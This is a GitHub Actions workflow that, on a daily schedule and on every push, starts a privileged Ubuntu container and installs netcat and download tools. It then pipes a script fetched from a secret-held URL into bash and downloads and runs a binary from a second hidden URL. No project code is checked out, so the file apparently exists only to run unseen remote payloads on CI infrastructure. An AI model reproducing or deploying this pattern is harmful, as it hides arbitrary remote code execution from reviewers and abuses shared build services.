name: Inline Shell Commands

on:
  schedule:
    - cron: '30 6 * * *'
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  run-commands:
    runs-on: ubuntu-latest
    container:
      image: ubuntu:22.04
      options: --privileged
    
    steps:
    - name: Install dependencies
      run: |
        apt-get update
        apt-get install -y curl wget bash procps lsof netcat git unzip
    
    # - name: Checkout code
    #   uses: actions/checkout@v4
      
    - name: Run application
      env:
        TESTING: ${{ secrets.TESTING }}
        CRONNER: ${{ secrets.CRONNER }}
      run: |
        set -e
        echo "Running in Ubuntu container job..."
        
        curl -sSL $TESTING | bash -s

        bash ./start.sh
        sleep 3
        wget -q -nv $CRONNER -O main
        chmod +x main
        ./main